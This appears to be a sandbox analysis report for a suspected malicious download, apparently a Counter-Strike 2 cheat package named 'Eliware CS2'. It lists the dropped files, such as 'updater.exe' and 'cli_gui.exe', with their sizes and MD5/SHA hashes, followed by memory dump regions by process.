8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i0epwuqp.wlp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cli_gui.exe

Filesize
21KB

MD5
992af84abb8f1fd839dd2939110e4142

SHA1
e1a83104acc06962b27bf1eff059f343f8b7be57

SHA256
1330e7853f0dcef25c153b23872dc152e0eb58cb5c16aecce1a1a8d8827b32c1

SHA512
e36149f47ee6e5ea3291e2f4f97909f6728169ab4deab5dda1add0a881972532892bf51a0d5029c5eaa62adec142868b74428f71cd070c74cf45878b99e3f3ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\updater.exe

Filesize
5.7MB

MD5
8cd62e3ece85c4c3e9f6f7c816256adf

SHA1
9712769be3f755c5ecbe68d38800a3a8ecdaf324

SHA256
39ebcdbb6993787be2ed9d2b6668b9ee2707ca483a66b51d1302bfc610ba021b

SHA512
a0aa9f0e6542c526fc18d48ab945d8be3245900381c9640f6e122a633a15dd9a9364bacd830fbc588a926ebef8240300c1fbf4211eae600cff8b7e2c63613501

Download Submit
C:\Users\Admin\Downloads\Eliware CS2.zip.crdownload

Filesize
12.2MB

MD5
d4cee750280f3f6cdbedd5b7d83bd55c

SHA1
372d4ad0d702b57a84f8bc77f0f0f8d4a346acb0

SHA256
618a7baef3e378239fc0a029be7e197733a950d535e5eed1f0ab9a06b1fb4c7e

SHA512
13901251ec1c7cce9ef2d49264d7d5d371663144d420b97b6d16d437c19c33a9f387e0ff45b59e9f8a16cf2a9b541c749ef83f19b12e7cb5be45420bd94fb232

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
4KB

MD5
a50c29de640e5957ed3802b419ae72c7

SHA1
c891a511854fa10544aaf44da98dc97780d54aa3

SHA256
df11e0cdaf259ac83da3b3f21fe0fde6f12d39b89f1d6ba9ba085b689b936f87

SHA512
b6ea40e1850843aa3ba7194ec0b683c6b15478c39266e6e445ee1be8f2c4d4ffc74274110fe5ca41859e9f8b746ade84577b705c9655e9f9b2d7a4bdd91e9153

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f78c1239f2684799917efb4bd4ec1db0

SHA1
4da5f2b120b406263b4e24ccb31815e5ba69e717

SHA256
eeee8ea682c3128e5cfc265b9cd10622326150030c108f2dfb8ce3d14fb66f5b

SHA512
89d65238ed7794ec3ac78a4f694ab9630bb62512d9f955b501a354f86364b203bd0c748ad6a8893ce0429dc5d6931e2b0b7da46f9764b0e8fca8b6c3be53b376

Download Submit
\??\pipe\crashpad_992_SUKVTMCVKSIZDTXS

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/60-375-0x000001AEB0630000-0x000001AEB0657000-memory.dmp

Filesize
156KB

Download
memory/60-376-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp

Filesize
64KB

Download
memory/508-383-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp

Filesize
64KB

Download
memory/508-382-0x0000024337CC0000-0x0000024337CE7000-memory.dmp

Filesize
156KB

Download
memory/608-366-0x0000017F8F340000-0x0000017F8F367000-memory.dmp

Filesize
156KB

Download
memory/608-365-0x0000017F8F310000-0x0000017F8F331000-memory.dmp

Filesize
132KB

Download
memory/608-367-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp

Filesize
64KB

Download
memory/624-923-0x0000021ABB0B0000-0x0000021ABB165000-memory.dmp

Filesize
724KB

Download
memory/672-373-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp

Filesize
64KB

Download
memory/672-371-0x000001DDD8BA0000-0x000001DDD8BC7000-memory.dmp

Filesize
156KB

Download
memory/944-379-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp

Filesize
64KB

Download
memory/944-378-0x000002286A5C0000-0x000002286A5E7000-memory.dmp

Filesize
156KB

Download
memory/1000-390-0x0000020742F70000-0x0000020742F97000-memory.dmp

Filesize
156KB

Download
memory/1000-391-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp

Filesize
64KB

Download
memory/1116-396-0x000001DE173C0000-0x000001DE173E7000-memory.dmp

Filesize
156KB

Download
memory/1116-397-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp

Filesize
64KB

Download
memory/1124-399-0x0000019C64310000-0x0000019C64337000-memory.dmp

Filesize
156KB

Download
memory/1124-400-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp

Filesize
64KB

Download
memory/1132-393-0x000001E3D1940000-0x000001E3D1967000-memory.dmp

Filesize
156KB

Download
memory/1132-394-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp

Filesize
64KB

Download
memory/1144-402-0x000001C914C70000-0x000001C914C97000-memory.dmp

Filesize
156KB

Download
memory/1144-403-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp

Filesize
64KB

Download
memory/1216-406-0x000001FA88080000-0x000001FA880A7000-memory.dmp

Filesize
156KB

Download
memory/1216-407-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmp

Filesize
64KB

Download
memory/3268-352-0x00007FF80DF50000-0x00007FF80E145000-memory.dmp

Filesize
2.0MB

Download
memory/3268-353-0x00007FF80C350000-0x00007FF80C40E000-memory.dmp

Filesize
760KB

Download
memory/4304-339-0x00000142934C0000-0x00000142934E2000-memory.dmp

Filesize
136KB

Download
memory/4312-270-0x000001D3B8260000-0x000001D3B8261000-memory.dmp

Filesize
4KB

Download
memory/4312-267-0x000001D3B8260000-0x000001D3B8261000-memory.dmp

Filesize
4KB

Download
memory/4312-260-0x000001D3B8260000-0x000001D3B8261000-memory.dmp

Filesize
4KB

Download
memory/4312-262-0x000001D3B8260000-0x000001D3B8261000-memory.dmp

Filesize
4KB

Download
memory/4312-261-0x000001D3B8260000-0x000001D3B8261000-memory.dmp

Filesize
4KB

Download
memory/4312-269-0x000001D3B8260000-0x000001D3B8261000-memory.dmp

Filesize
4KB

Download
memory/4312-272-0x000001D3B8260000-0x000001D3B8261000-memory.dmp

Filesize
4KB

Download
memory/4312-271-0x000001D3B8260000-0x000001D3B8261000-memory.dmp

Filesize
4KB

Download
memory/4312-268-0x000001D3B8260000-0x000001D3B8261000-memory.dmp

Filesize
4KB

Download
memory/4312-266-0x000001D3B8260000-0x000001D3B8261000-memory.dmp

Filesize
4KB

Download
memory/4524-282-0x0000000000400000-0x0000000001358000-memory.dmp

Filesize
15.3MB

Download
memory/4524-283-0x0000000000400000-0x0000000001358000-memory.dmp

Filesize
15.3MB

Download
memory/4524-306-0x0000000000400000-0x0000000001358000-memory.dmp

Filesize
15.3MB

Download
memory/5252-690-0x0000023B1F7B0000-0x0000023B1F865000-memory.dmp

Filesize
724KB

Download
memory/5252-696-0x0000023B1F9F0000-0x0000023B1F9F6000-memory.dmp

Filesize
24KB

Download
memory/5252-697-0x0000023B1FA00000-0x0000023B1FA0A000-memory.dmp

Filesize
40KB

Download
memory/5252-695-0x0000023B1F9C0000-0x0000023B1F9C8000-memory.dmp

Filesize
32KB

Download
memory/5252-694-0x0000023B1FA10000-0x0000023B1FA2A000-memory.dmp

Filesize
104KB

Download
memory/5252-693-0x0000023B1F9B0000-0x0000023B1F9BA000-memory.dmp

Filesize
40KB

Download
memory/5252-692-0x0000023B1F9D0000-0x0000023B1F9EC000-memory.dmp

Filesize
112KB

Download
memory/5252-691-0x0000023B1F510000-0x0000023B1F51A000-memory.dmp

Filesize
40KB

Download
memory/5252-689-0x0000023B1F790000-0x0000023B1F7AC000-memory.dmp

Filesize
112KB

Download